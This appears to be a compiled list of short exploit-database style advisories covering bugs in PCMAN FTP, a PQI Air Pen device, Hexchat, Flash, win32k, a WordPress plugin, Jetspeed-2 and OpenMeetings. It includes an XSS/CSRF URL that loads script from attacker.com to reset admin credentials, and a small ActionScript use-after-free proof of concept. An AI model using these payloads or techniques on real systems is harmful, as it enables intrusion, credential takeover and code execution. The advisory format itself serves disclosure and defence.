This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credientials are enabled.
If a user visits a page bellow, this will set the administrative credential for PQI Air Pen express to 'root:r00t'. The attacker can also abuse of the multiple XSS in this device to exploit this vulnerability, something like this to set the same cred 'root:r00t': http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22http://attacker.com/csrf.js%22%3C/script%3E
Hexchat IRC client receives the available extensions from the IRC server (CAP LS message) and constructs the request string to indicate later which one to use (CAP REQ message). This request string is stored in the fixed size (256 bytes) byte array 'buffer'. It has enough space for all possible options combined, BUT it will overflow if some options are repeated.
Overflowing title/artist tags on an *.mp3 seems to crash the software. (works on both standalone/portable versions)
A use-after-free vulnerability exists in Color.setTransform when it is set to a transform that deletes the field it is called on. A proof-of-concept is provided in the text, and a sample swf and fla are attached.
There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows: var times = 0; var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.maxChars = {valueOf : func}; function func(){ if (times == 0){ times++; return 7; } mc.removeMovieClip(); // Fix heap here return 7; }
The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win32k.sys. The crashes are triggered in multiple different ways, such as by calling NtGdiGetTextMetricsW with a NULL pointer, or by calling NtGdiGetTextExtentExW with a NULL pointer.
A vulnerability in the Advanced-Video-Embed plugin for WordPress allows an unauthenticated attacker to download arbitrary files from the server. This is due to the lack of input validation in the ave_publishPost() function in the /inc/classes/class.avePost.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the admin-ajax.php file with the action parameter set to ave_publishPost and the thumb parameter set to the path of the file to be downloaded.
This module exploits the unsecured User Manager REST API and a ZIP file path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier versions, to upload and execute a shell. Note: this exploit will create, use, and then delete a new admin user. Warning: in testing, exploiting the file upload clobbered the web interface beyond repair. No workaround has been found yet. Use this module at your own risk. No check will be implemented.
The Import/Export System Backups functionality in the OpenMeetings Administration menu (http://domain:5080/openmeetings/#admin/backup) is vulnerable to path traversal via specially crafted file names within ZIP archives. By uploading an archive containing a file named ../../../public/hello.txt will write the file 'hello.txt' to the http://domain:5080/openmeetings/public/ directory. This could be used to, for example, overwrite the /usr/bin/convert file (or any other 3rd party integrated executable) with a shell script, which would be executed the next time an image file is uploaded and imagemagick is invoked.
Services By CQR